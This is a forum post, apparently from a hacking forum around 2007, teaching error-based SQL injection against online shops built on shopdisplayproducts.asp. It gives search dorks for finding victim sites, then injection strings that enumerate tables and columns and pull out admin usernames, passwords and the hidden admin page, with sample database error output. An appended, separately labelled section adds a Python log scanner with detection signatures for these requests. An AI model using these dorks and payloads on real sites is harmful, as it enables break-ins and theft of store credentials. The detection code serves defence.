phucxp
03-02-2007, 12:12 AM
Search keys:
{allinurl:”shopdisplayproducts.asp?id="}
{allinurl:”.com/shopdisplayproducts.asp?id= "}
**Notes:
_".com" can be replaced by ".net.","biz.",".us"
_"id" can be replaced by "cat"
When searching, we can add a value for "id="; it will make finding shops easier.
//////////////////////////////////////////////////////////////
If the error is: Unclosed quotation mark before the character string
we use this script to get the tables:
{and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password }
**Notes:
_ We must delete the "'" mark before adding the script
_ If %20 appears in the URL, don't worry; it's just the ASCII of space, because IE doesn't accept spaces in URLs
If the error is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
the result 'ver_Faq' is the first table; then we add this script to the URL:
{and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password}
The result is:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
then we add this script to the url:
{and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq','coupons')))--sp_password}
We continue doing that until we find tables like: users, tbluser, AdminUsers...
For example, in this case the table is "tbluser".
We use this to take the column:
{and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser')))--sp_password}
the result is:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
we add this script:
{and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Take the next column by the script:
{1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Now we can take username and password T_T
//////////////////////////////////////////////////////////////////////////
*Take user by this script:
{and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
----------> username is "admin".
*Take password by this script:
{and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
----------> pass is "1234"
*Or take username/password by this script:
{and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password}
***** "%2b" is ascii of "+"
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
---------->username/password is "admin/1234"
///////////////////////////////////////////////////////////////////////////
Now we search for the admin link:
We know that the columns "fieldvalue" and "fieldname" contain the admin link.
The columns "fieldvalue" and "fieldname" are often inside the table "configuration".
The table "congratulation" is always renamed.
So we must use the key "like" to search for the column "filedvalue":
{and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25filedvalue%25')))--sp_password}
We use this script to take the admin link:
{and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
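Added example, not part of the original post: a log-side check for the request shapes quoted above, run over constructed IIS W3C log lines. The signature names, the sample log lines, their dates and the client addresses are assumptions made for illustration; the page stem and the query shapes are the ones shown in the post.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the request shapes quoted in the post (names are illustrative).
SIGNATURES = {
    "convert_int_subselect": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select", re.I),
    "information_schema": re.compile(r"information_schema\.(tables|columns)", re.I),
    "sp_password_trailer": re.compile(r"--\s*sp_password", re.I),
}

# Constructed sample in IIS W3C extended format; dates and addresses are made up.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-03-02 00:12:01 192.0.2.10 GET /shopping/shopdisplayproducts.asp id=5 200
2007-03-02 00:12:09 192.0.2.44 GET /shopping/shopdisplayproducts.asp id=5+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--sp_password 500
2007-03-02 00:12:30 192.0.2.44 GET /shopping/shopdisplayproducts.asp id=5%20and%201=convert(int,(select%20top%201%20fldusername%20from%20tbluser))--sp_password 500
"""

def match_signatures(raw_query):
    """Return sorted signature names found in the URL-decoded query string."""
    # Decode twice so double-encoded input (%2520 for a space) is still matched.
    decoded = unquote_plus(unquote_plus(raw_query))
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan(log_text):
    """Return one finding per request whose query matches at least one signature."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        entry = dict(zip(fields, line.split(" ")))
        hits = match_signatures(entry.get("cs-uri-query", "-"))
        if hits:
            findings.append({
                "client": entry.get("c-ip"),
                "stem": entry.get("cs-uri-stem"),
                # A 500 on a matching request suggests the driver error reached the client.
                "error_returned": entry.get("sc-status") == "500",
                "signatures": hits,
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with error_returned set means the detailed ODBC error text was sent back to the client; the underlying fixes are a parameterized query for the id value and generic error pages in place of driver messages.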